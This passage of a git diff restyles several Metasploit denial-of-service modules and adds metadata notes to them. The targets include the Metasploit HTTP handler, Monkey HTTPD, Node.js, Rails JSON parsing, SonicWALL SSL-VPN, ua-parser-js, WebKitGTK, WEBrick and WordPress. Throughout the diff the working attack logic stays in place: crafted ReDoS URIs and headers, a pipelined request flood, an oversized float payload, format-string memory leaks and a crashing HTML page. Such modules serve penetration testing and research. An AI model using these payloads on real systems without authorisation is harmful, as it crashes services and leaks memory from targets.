-    rescue ::Rex::ConnectionRefused
-      print_error("Unable to connect to #{peer}.")
+    if res && res.code >= 100 && res.code < 500
+      print_status("Test request successful, attempting to send payload. Server returned #{res.code}")
+      return true
+    else
       return false
     end
+  rescue ::Rex::ConnectionRefused
+    print_error("Unable to connect to #{peer}.")
+    return false
   end
 end

--- a/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
+++ b/modules/auxiliary/dos/http/metasploit_httphandler_dos.rb
@@ -8,99 +8,105 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name' => 'Metasploit HTTP(S) handler DoS',
-      'Description' => %q{
-        This module exploits the Metasploit HTTP(S) handler by sending
-        a specially crafted HTTP request that gets added as a resource handler.
-        Resources (which come from the external connections) are evaluated as RegEx
-        in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.
+    super(
+      update_info(
+        info,
+        'Name' => 'Metasploit HTTP(S) handler DoS',
+        'Description' => %q{
+          This module exploits the Metasploit HTTP(S) handler by sending
+          a specially crafted HTTP request that gets added as a resource handler.
+          Resources (which come from the external connections) are evaluated as RegEx
+          in the handler server. Specially crafted input can trigger Gentle, Soft and Hard DoS.
 
-        Tested against Metasploit 5.0.20.
-      },
-      'Author' => [
-        'Jose Garduno, Dreamlab Technologies AG', #Vulnerability Discovery, Metasploit module.
-        'Angelo Seiler, Dreamlab Technologies AG', #Additional research, debugging.
-      ],
-      'License' => MSF_LICENSE,
-      'References' => [
-        ['CVE', '2019-5645']
-      ],
-      'DisclosureDate' => '2019-09-04'
-    ))
+          Tested against Metasploit 5.0.20.
+        },
+        'Author' => [
+          'Jose Garduno, Dreamlab Technologies AG', # Vulnerability Discovery, Metasploit module.
+          'Angelo Seiler, Dreamlab Technologies AG', # Additional research, debugging.
+        ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          ['CVE', '2019-5645']
+        ],
+        'DisclosureDate' => '2019-09-04',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
-        [
-            OptEnum.new('DOSTYPE', [true, 'Type of DoS to trigger', 'HARD', %w[GENTLE SOFT HARD]])
-        ])
+      [
+        OptEnum.new('DOSTYPE', [true, 'Type of DoS to trigger', 'HARD', %w[GENTLE SOFT HARD]])
+      ]
+    )
   end
 
   def test_service_unresponsive
-    begin
-      print_status('Testing for service unresponsiveness.')
+    print_status('Testing for service unresponsiveness.')
 
-      res = send_request_cgi({
-                                 'uri' => '/' + Rex::Text.rand_text_alpha(8),
-                                 'method' => 'GET'
-                             })
+    res = send_request_cgi({
+      'uri' => '/' + Rex::Text.rand_text_alpha(8),
+      'method' => 'GET'
+    })
 
-      if res.nil?
-        print_good('SUCCESS, Service not responding.')
-      else
-        print_error('Service responded with a valid HTTP Response; Attack failed.')
-      end
-    rescue ::Rex::ConnectionRefused
-      print_error('An unknown error occurred.')
-    rescue ::Timeout::Error
-      print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
+    if res.nil?
+      print_good('SUCCESS, Service not responding.')
+    else
+      print_error('Service responded with a valid HTTP Response; Attack failed.')
     end
+  rescue ::Rex::ConnectionRefused
+    print_error('An unknown error occurred.')
+  rescue ::Timeout::Error
+    print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
   end
-
 
   def dos
     case datastore['DOSTYPE']
-    when "HARD"
-      resone = send_request_cgi(
-          'method' => 'GET',
-          'uri' => normalize_uri("/%2f%26%28%21%7c%23%2b%29%2b%40%32%30")
+    when 'HARD'
+      send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri('/%2f%26%28%21%7c%23%2b%29%2b%40%32%30')
       )
       begin
-        restwo = send_request_cgi(
-            'method' => 'GET',
-            'uri' => normalize_uri("/%26%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%21")
+        send_request_cgi(
+          'method' => 'GET',
+          'uri' => normalize_uri('/%26%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%23%21')
         )
       rescue ::Errno::EPIPE, ::Timeout::Error
         # Same exceptions the HttpClient mixin catches
       end
       test_service_unresponsive
 
-    when "SOFT"
-      resone = send_request_cgi(
-          'method' => 'GET',
-          'uri' => normalize_uri("/%5b20")
+    when 'SOFT'
+      send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri('/%5b20')
       )
 
       test_service_unresponsive
 
-    when "GENTLE"
-      resone = send_request_cgi(
-          'method' => 'GET',
-          'uri' => normalize_uri("/%2e%2a%7c%32%30%7c%5c")
+    when 'GENTLE'
+      send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri('/%2e%2a%7c%32%30%7c%5c')
       )
 
       sleep(1)
 
-      restwo = send_request_cgi(
-          'method' => 'GET',
-          'uri' => normalize_uri("/whatever")
+      send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri('/whatever')
       )
 
       resthree = send_request_cgi(
-          'method' => 'GET',
-          'uri' => normalize_uri("/whatever2")
+        'method' => 'GET',
+        'uri' => normalize_uri('/whatever2')
       )
 
-      if resthree.body.length == 0
+      if resthree.body.empty?
         print_good('SUCCESS, Service not responding.')
       else
         print_error('Service responded with a valid HTTP Response; Attack failed.')
@@ -110,7 +116,7 @@ class MetasploitModule < Msf::Auxiliary
       fail_with Failure::BadConfig, 'Invalid DOSTYPE selected'
     end
 
-    print_status("DOS request sent")
+    print_status('DOS request sent')
   end
 
   def is_alive?

--- a/modules/auxiliary/dos/http/monkey_headers.rb
+++ b/modules/auxiliary/dos/http/monkey_headers.rb
@@ -8,29 +8,37 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Monkey HTTPD Header Parsing Denial of Service (DoS)',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Monkey HTTPD Header Parsing Denial of Service (DoS)',
+        'Description' => %q{
           This module causes improper header parsing that leads to a segmentation fault
-        due to a specially crafted HTTP request. Affects version <= 1.2.0.
-      },
-      'Author'         =>
-        [
+          due to a specially crafted HTTP request. Affects version <= 1.2.0.
+        },
+        'Author' => [
           'Doug Prostko <dougtko[at]gmail.com>'
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           ['CVE', '2013-3843'],
           ['OSVDB', '93853'],
           ['BID', '60333']
         ],
-      'DisclosureDate' => '2013-05-30'))
+        'DisclosureDate' => '2013-05-30',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(2001)
-      ])
+      ]
+    )
   end
 
   def dos

--- a/modules/auxiliary/dos/http/nodejs_pipelining.rb
+++ b/modules/auxiliary/dos/http/nodejs_pipelining.rb
@@ -8,36 +8,43 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Node.js HTTP Pipelining Denial of Service',
-      'Description'    => %q{
-        This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
-        released before 0.10.21 and 0.8.26. The attack sends many pipelined
-        HTTP requests on a single connection, which causes unbounded memory
-        allocation when the client does not read the responses.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Node.js HTTP Pipelining Denial of Service',
+        'Description' => %q{
+          This module exploits a Denial of Service (DoS) condition in the HTTP parser of Node.js versions
+          released before 0.10.21 and 0.8.26. The attack sends many pipelined
+          HTTP requests on a single connection, which causes unbounded memory
+          allocation when the client does not read the responses.
+        },
+        'Author' => [
           'Marek Majkowski', # Vulnerability discovery
           'titanous',        # Metasploit module
           'joev'             # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2013-4450' ],
           [ 'OSVDB', '98724' ],
-          [ 'BID' , '63229' ],
+          [ 'BID', '63229' ],
           [ 'URL', 'https://nodejs.org/ja/blog/vulnerability/http-server-pipeline-flood-dos/' ]
         ],
-      'DisclosureDate' => '2013-10-18'))
+        'DisclosureDate' => '2013-10-18',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
         Opt::RPORT(80),
-        OptInt.new('RLIMIT', [true,  "Number of requests to send", 100000])
-      ],
-    self.class)
+        OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])
+      ]
+    )
   end
 
   def check
@@ -45,14 +52,14 @@ class MetasploitModule < Msf::Auxiliary
     # check if we are < 0.10.17 by seeing if a malformed HTTP request is accepted
     status = Exploit::CheckCode::Safe
     connect
-    sock.put(http_request("GEM"))
+    sock.put(http_request('GEM'))
     begin
       response = sock.get_once
       status = Exploit::CheckCode::Appears if response =~ /HTTP/
     rescue EOFError
       # checking against >= 0.10.17 raises EOFError because there is no
       # response to GEM requests
-      vprint_error("Failed to determine the vulnerable state due to an EOFError (no response)")
+      vprint_error('Failed to determine the vulnerable state due to an EOFError (no response)')
       return Msf::Exploit::CheckCode::Unknown
     ensure
       disconnect
@@ -61,19 +68,19 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def host
-      host = datastore['RHOST']
-      host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
-      host
+    host = datastore['RHOST']
+    host += ':' + datastore['RPORT'].to_s if datastore['RPORT'] != 80
+    host
   end
 
-  def http_request(method='GET')
+  def http_request(method = 'GET')
     "#{method} / HTTP/1.1\r\nHost: #{host}\r\n\r\n"
   end
 
   def run
     payload = http_request
     begin
-      print_status("Stressing the target memory...")
+      print_status('Stressing the target memory...')
       connect
       datastore['RLIMIT'].times { sock.put(payload) }
       print_status("Attack finished. If you read it, it wasn't enough to trigger an Out Of Memory condition.")

--- a/modules/auxiliary/dos/http/rails_json_float_dos.rb
+++ b/modules/auxiliary/dos/http/rails_json_float_dos.rb
@@ -8,34 +8,42 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS',
-      'Description'    => %q{
-        When Ruby attempts to convert a string representation of a large floating point
-        decimal number to its floating point equivalent, a heap-based buffer overflow
-        can be triggered. This module has been tested successfully on a Ruby on Rails application
-        using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application
-        crashes with a segfault error. Other versions of Ruby are reported to be affected.
-      },
-      'Author'         =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Ruby on Rails JSON Processor Floating Point Heap Overflow DoS',
+        'Description' => %q{
+          When Ruby attempts to convert a string representation of a large floating point
+          decimal number to its floating point equivalent, a heap-based buffer overflow
+          can be triggered. This module has been tested successfully on a Ruby on Rails application
+          using Ruby version 1.9.3-p448 with WebRick and Thin web servers, where the Rails application
+          crashes with a segfault error. Other versions of Ruby are reported to be affected.
+        },
+        'Author' => [
           'Charlie Somerville', # original discoverer
           'joev', # bash PoC
           'todb', # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2013-4164' ],
           [ 'OSVDB', '100113' ],
           [ 'URL', 'https://www.ruby-lang.org/en/news/2013/11/22/ruby-1-9-3-p484-is-released/' ]
         ],
-      'DisclosureDate' => '2013-11-22'))
+        'DisclosureDate' => '2013-11-22',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
     register_options(
       [
         OptString.new('TARGETURI', [false, 'The URL of the vulnerable Rails application', '/']),
         OptString.new('HTTPVERB', [false, 'The HTTP verb to use', 'POST'])
-      ])
+      ]
+    )
   end
 
   def uri
@@ -55,7 +63,7 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def multiplier
-    (500_000 * (1.0/digit_pattern.size)).to_i
+    (500_000 * (1.0 / digit_pattern.size)).to_i
   end
 
   def fractional_part
@@ -68,7 +76,7 @@ class MetasploitModule < Msf::Auxiliary
   # easier to produce, and slightly better than the static "1.1111..."
   # for 300,000 decimal places.
   def evil_float_string
-    [integer_part,fractional_part].join('.')
+    [integer_part, fractional_part].join('.')
   end
 
   def run
@@ -82,46 +90,46 @@ class MetasploitModule < Msf::Auxiliary
     begin
       res = send_request_cgi(
         {
-          'method'  => verb,
-          'uri'     => uri,
-          'ctype'   => "application/json",
-          'data'    => sploit
-        })
+          'method' => verb,
+          'uri' => uri,
+          'ctype' => 'application/json',
+          'data' => sploit
+        }
+      )
     rescue ::Rex::ConnectionRefused
-      print_error "Unable to connect. (Connection refused)"
+      print_error 'Unable to connect. (Connection refused)'
       target_available = false
     rescue ::Rex::HostUnreachable
-      print_error "Unable to connect. (Host unreachable)"
+      print_error 'Unable to connect. (Host unreachable)'
       target_available = false
     rescue ::Rex::ConnectionTimeout
-      print_error "Unable to connect. (Timeout)"
+      print_error 'Unable to connect. (Timeout)'
       target_available = false
     end
 
     return unless target_available
 
-    print_status "Checking availability"
+    print_status 'Checking availability'
     begin
       res = send_request_cgi({
         'method' => verb,
         'uri' => uri,
-        'ctype' => "application/json",
-        'data' => Rex::Text.rand_text_alpha(1+rand(64)).to_json
+        'ctype' => 'application/json',
+        'data' => Rex::Text.rand_text_alpha(1..64).to_json
       })
-      if res and res.body and res.body.size > 0
+      if res && res.body && !res.body.empty?
         target_available = true
       else
         print_good "#{peer}#{uri} - DoS appears successful (No useful response from host)"
         target_available = false
       end
     rescue ::Rex::ConnectionError, Errno::ECONNRESET
-      print_good "DoS appears successful (Host unreachable)"
+      print_good 'DoS appears successful (Host unreachable)'
       target_available = false
     end
 
     return unless target_available
 
-    print_error "Target is still responsive, DoS was unsuccessful."
-
+    print_error 'Target is still responsive, DoS was unsuccessful.'
   end
 end

--- a/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
+++ b/modules/auxiliary/dos/http/sonicwall_ssl_format.rb
@@ -8,25 +8,33 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos # %n etc kills a thread, but otherwise ok.
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'SonicWALL SSL-VPN Format String Vulnerability',
-      'Description'    => %q{
-        There is a format string vulnerability within the SonicWALL
-        SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory
-        can be read or written to, depending on the format string used.
-        There appears to be a length limit of 127 characters of format
-        string data. With physical access to the device and debugging,
-        this module may be able to be used to execute arbitrary code remotely.
-      },
-      'Author'         => [ 'aushack' ],
-      'License'        => MSF_LICENSE,
-      'References'     => [
-        [ 'BID', '35145' ],
-        #[ 'CVE', '' ], # no CVE?
-        [ 'OSVDB', '54881' ],
-        [ 'URL', 'http://www.aushack.com/200905-sonicwall.txt' ],
-      ],
-      'DisclosureDate' => '2009-05-29'))
+    super(
+      update_info(
+        info,
+        'Name' => 'SonicWALL SSL-VPN Format String Vulnerability',
+        'Description' => %q{
+          There is a format string vulnerability within the SonicWALL
+          SSL-VPN Appliance - 200, 2000 and 4000 series. Arbitrary memory
+          can be read or written to, depending on the format string used.
+          There appears to be a length limit of 127 characters of format
+          string data. With physical access to the device and debugging,
+          this module may be able to be used to execute arbitrary code remotely.
+        },
+        'Author' => [ 'aushack' ],
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'BID', '35145' ],
+          [ 'OSVDB', '54881' ],
+          [ 'URL', 'http://www.aushack.com/200905-sonicwall.txt' ],
+        ],
+        'DisclosureDate' => '2009-05-29',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options([
       OptString.new('URI', [ true, 'URI to request', '/cgi-bin/welcome/VirtualOffice?err=' ]),
@@ -38,25 +46,26 @@ class MetasploitModule < Msf::Auxiliary
 
   def run
     if (datastore['FORMAT'].length > 125) # Max length is 127 bytes
-      print_error("FORMAT string length cannot exceed 125 bytes.")
+      print_error('FORMAT string length cannot exceed 125 bytes.')
       return
     end
 
-    fmt = datastore['FORMAT'] + "XX"  # XX is 2 bytes used to mark end of memory garbage for regexp
+    fmt = datastore['FORMAT'] + 'XX' # XX is 2 bytes used to mark end of memory garbage for regexp
     begin
       res = send_request_raw({
-        'uri' => normalize_uri(datastore['URI']) + fmt,
+        'uri' => normalize_uri(datastore['URI']) + fmt
       })
 
-      if res and res.code == 200
+      if res && (res.code == 200)
         res.body.scan(/\<td class\=\"loginError\"\>(.+)XX/ism)
-        print_status("Information leaked: #{$1}")
+        print_status("Information leaked: #{::Regexp.last_match(1)}")
       end
 
       print_status("Request sent to #{rhost}:#{rport}")
     rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
       print_status("Couldn't connect to #{rhost}:#{rport}")
-    rescue ::Timeout::Error, ::Errno::EPIPE
+    rescue ::Timeout::Error, ::Errno::EPIPE => e
+      vprint_error(e.message)
     end
   end
 end

--- a/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
+++ b/modules/auxiliary/dos/http/tautulli_shutdown_exec.rb
@@ -15,7 +15,12 @@ class MetasploitModule < Msf::Auxiliary
       'References' => [
         ['CVE', '2019-19833'],
         ['EDB', '47785']
-      ]
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SERVICE_DOWN],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
     register_options([ Opt::RPORT(8181) ])
   end

--- a/modules/auxiliary/dos/http/ua_parser_js_redos.rb
+++ b/modules/auxiliary/dos/http/ua_parser_js_redos.rb
@@ -9,7 +9,7 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'        => 'ua-parser-js npm module ReDoS',
+      'Name' => 'ua-parser-js npm module ReDoS',
       'Description' => %q{
         This module exploits a Regular Expression Denial of Service vulnerability
         in the npm module "ua-parser-js". Server-side applications that use
@@ -17,18 +17,21 @@ class MetasploitModule < Msf::Auxiliary
         if they call the "getOS" or "getResult" functions. This vulnerability was
         fixed as of version 0.7.16.
       },
-      'References'  =>
-        [
-          ['CVE', '2017-16086'],
-          ['URL', 'https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79'],
-          ['CWE', '400'],
-        ],
-      'Author'      =>
-        [
-          'Ryan Knell,  Sonatype Security Research',
-          'Nick Starke, Sonatype Security Research',
-        ],
-      'License'     =>  MSF_LICENSE
+      'References' => [
+        ['CVE', '2017-16086'],
+        ['URL', 'https://github.com/faisalman/ua-parser-js/commit/25e143ee7caba78c6405a57d1d06b19c1e8e2f79'],
+        ['CWE', '400'],
+      ],
+      'Author' => [
+        'Ryan Knell,  Sonatype Security Research',
+        'Nick Starke, Sonatype Security Research',
+      ],
+      'License' => MSF_LICENSE,
+      'Notes' => {
+        'Stability' => [CRASH_SERVICE_DOWN],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
 
     register_options([
@@ -37,78 +40,71 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    unless test_service
-      fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")
-    else
+    if test_service
       trigger_redos
       test_service_unresponsive
+    else
+      fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.")
     end
   end
 
   def trigger_redos
-    begin
-      print_status("Sending ReDoS request to #{peer}.")
+    print_status("Sending ReDoS request to #{peer}.")
 
-      res = send_request_cgi({
-        'uri' => '/',
-        'method' => 'GET',
-        'headers' => {
-          'user-agent' => 'iphone os ' + (Rex::Text.rand_text_alpha(1) * 64)
-        }
-      })
+    res = send_request_cgi({
+      'uri' => '/',
+      'method' => 'GET',
+      'headers' => {
+        'user-agent' => 'iphone os ' + (Rex::Text.rand_text_alpha(1) * 64)
+      }
+    })
 
-      if res.nil?
-        print_status("No response received from #{peer}, service is most likely unresponsive.")
-      else
-        fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
-      end
-
-    rescue ::Rex::ConnectionRefused
-      print_error("Unable to connect to #{peer}.")
-    rescue ::Timeout::Error
-      print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
+    if res.nil?
+      print_status("No response received from #{peer}, service is most likely unresponsive.")
+    else
+      fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.")
     end
+  rescue ::Rex::ConnectionRefused
+    print_error("Unable to connect to #{peer}.")
+  rescue ::Timeout::Error
+    print_status("No HTTP response received from #{peer}, this indicates the payload was successful.")
   end
 
   def test_service_unresponsive
-    begin
-      print_status('Testing for service unresponsiveness.')
+    print_status('Testing for service unresponsiveness.')
 
-      res = send_request_cgi({
-        'uri' => '/' + Rex::Text.rand_text_alpha(8),
-        'method' => 'GET'
-      })
+    res = send_request_cgi({
+      'uri' => '/' + Rex::Text.rand_text_alpha(8),
+      'method' => 'GET'
+    })
 
-      if res.nil?
-        print_good('Service not responding.')
-      else
-        print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
-      end
-    rescue ::Rex::ConnectionRefused
-      print_error('An unknown error occurred.')
-    rescue ::Timeout::Error
-      print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
+    if res.nil?
+      print_good('Service not responding.')
+    else
+      print_error('Service responded with a valid HTTP Response; ReDoS attack failed.')
     end
+  rescue ::Rex::ConnectionRefused
+    print_error('An unknown error occurred.')
+  rescue ::Timeout::Error
+    print_good('HTTP request timed out, most likely the ReDoS attack was successful.')
   end
 
   def test_service
-    begin
-      print_status('Testing Service to make sure it is working.')
+    print_status('Testing Service to make sure it is working.')
 
-      res = send_request_cgi({
-        'uri' => '/' + Rex::Text.rand_text_alpha(8),
-        'method' => 'GET'
-      })
+    res = send_request_cgi({
+      'uri' => '/' + Rex::Text.rand_text_alpha(8),
+      'method' => 'GET'
+    })
 
-      if !res.nil? && (res.code == 200 || res.code == 404)
-        print_status('Test request successful, attempting to send payload')
-        return true
-      else
-        return false
-      end
-    rescue ::Rex::ConnectionRefused
-      print_error("Unable to connect to #{peer}.")
+    if !res.nil? && (res.code == 200 || res.code == 404)
+      print_status('Test request successful, attempting to send payload')
+      return true
+    else
       return false
     end
+  rescue ::Rex::ConnectionRefused
+    print_error("Unable to connect to #{peer}.")
+    return false
   end
 end

--- a/modules/auxiliary/dos/http/webkitplus.rb
+++ b/modules/auxiliary/dos/http/webkitplus.rb
@@ -11,17 +11,17 @@ class MetasploitModule < Msf::Auxiliary
     super(
       update_info(
         info,
-        'Name'           => "WebKitGTK+ WebKitFaviconDatabase DoS",
-        'Description'    => %q(
+        'Name' => 'WebKitGTK+ WebKitFaviconDatabase DoS',
+        'Description' => %q{
           This module exploits a vulnerability in WebKitFaviconDatabase when pageURL is unset.
           If successful, it could lead to application crash, resulting in denial of service.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         => [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Dhiraj Mishra', # Original discovery, disclosure
           'Hardik Mehta',  # Original discovery, disclosure
           'Zubin Devnani', # Original discovery, disclosure
-          'Manuel Caballero' #JS Code
+          'Manuel Caballero' # JS Code
         ],
         'References' => [
           ['EDB', '44842'],
@@ -30,9 +30,14 @@ class MetasploitModule < Msf::Auxiliary
           ['URL', 'https://www.inputzero.io/2018/06/cve-2018-11646-webkit.html']
         ],
         'DisclosureDate' => '2018-06-03',
-        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],
         'PassiveActions' => [ 'WebServer' ],
-        'DefaultAction'  => 'WebServer'
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end
@@ -42,14 +47,14 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def setup
-    @html = <<-JS
-<script type="text/javascript">
- win = window.open("WIN", "WIN");
- window.open("http://example.com/", "WIN");
- win.document.execCommand('stop');
- win.document.write("HelloWorld");
- win.document.close();
-</script>
+    @html = <<~JS
+      <script type="text/javascript">
+       win = window.open("WIN", "WIN");
+       window.open("http://example.com/", "WIN");
+       win.document.execCommand('stop');
+       win.document.write("HelloWorld");
+       win.document.close();
+      </script>
     JS
   end
 

--- a/modules/auxiliary/dos/http/webrick_regex.rb
+++ b/modules/auxiliary/dos/http/webrick_regex.rb
@@ -8,23 +8,32 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
-      'Description'    => %q{
-        The WEBrick::HTTP::DefaultFileHandler in WEBrick in
-        Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7
-        to 1.8.7-p71, and 1.9 to r18423 allows for a DoS
-        (CPU consumption) via a crafted HTTP request.
-      },
-      'Author'         => 'kris katterjohn',
-      'License'        => MSF_LICENSE,
-      'References'     => [
-        [ 'BID', '30644'],
-        [ 'CVE', '2008-3656'],
-        [ 'OSVDB', '47471' ],
-        [ 'URL', 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']
-      ],
-      'DisclosureDate' => '2008-08-08'))
+    super(
+      update_info(
+        info,
+        'Name' => 'Ruby WEBrick::HTTP::DefaultFileHandler DoS',
+        'Description' => %q{
+          The WEBrick::HTTP::DefaultFileHandler in WEBrick in
+          Ruby 1.8.5 and earlier, 1.8.6 to 1.8.6-p286, 1.8.7
+          to 1.8.7-p71, and 1.9 to r18423 allows for a DoS
+          (CPU consumption) via a crafted HTTP request.
+        },
+        'Author' => 'kris katterjohn',
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'BID', '30644'],
+          [ 'CVE', '2008-3656'],
+          [ 'OSVDB', '47471' ],
+          [ 'URL', 'http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/']
+        ],
+        'DisclosureDate' => '2008-08-08',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options([
       OptString.new('URI', [ true, 'URI to request', '/' ])
@@ -32,21 +41,20 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    begin
-      o = {
-        'uri' => normalize_uri(datastore['URI']),
-        'headers' => {
-          'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
-        }
+    o = {
+      'uri' => normalize_uri(datastore['URI']),
+      'headers' => {
+        'If-None-Match' => %q{foo=""} + %q{bar="baz" } * 100
       }
+    }
 
-      c = connect(o)
-      c.send_request(c.request_raw(o))
+    c = connect(o)
+    c.send_request(c.request_raw(o))
 
-      print_status("Request sent to #{rhost}:#{rport}")
-    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
-      print_status("Couldn't connect to #{rhost}:#{rport}")
-    rescue ::Timeout::Error, ::Errno::EPIPE
-    end
+    print_status("Request sent to #{rhost}:#{rport}")
+  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+    print_status("Couldn't connect to #{rhost}:#{rport}")
+  rescue ::Timeout::Error, ::Errno::EPIPE => e
+    vprint_error(e.message)
   end
 end

--- a/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
+++ b/modules/auxiliary/dos/http/wordpress_directory_traversal_dos.rb
@@ -8,28 +8,34 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(
-      info,
-      'Name'            => 'WordPress Traversal Directory DoS',
-      'Description'     =>  %q{
-        Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin
-        function in wp-admin/includes/ajax-actions.php in WordPress before 4.6
-        allows remote attackers to hijack the authentication of subscribers
-        for /dev/random read operations by leveraging a late call to
-        the check_ajax_referer function, a related issue to CVE-2016-6896.},
-      'License'         => MSF_LICENSE,
-      'Author'          =>
-        [
-          'Yorick Koster',           # Vulnerability disclosure
-          'CryptisStudents'          # Metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress Traversal Directory DoS',
+        'Description' => %q{
+          Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin
+          function in wp-admin/includes/ajax-actions.php in WordPress before 4.6
+          allows remote attackers to hijack the authentication of subscribers
+          for /dev/random read operations by leveraging a late call to
+          the check_ajax_referer function, a related issue to CVE-2016-6896.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Yorick Koster', # Vulnerability disclosure
+          'CryptisStudents' # Metasploit module
         ],
-      'References'      =>
-        [
+        'References' => [
           ['CVE', '2016-6897'],
           ['EDB', '40288'],
           ['OVE', 'OVE-20160712-0036']
         ],
-    ))
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options(
       [
@@ -39,7 +45,8 @@ class MetasploitModule < Msf::Auxiliary
         OptInt.new('DEPTH', [true, 'The depth of the path', 10]),
         OptString.new('USERNAME', [true, 'The username to send the requests with', '']),
         OptString.new('PASSWORD', [true, 'The password to send the requests with', ''])
-        ])
+      ]
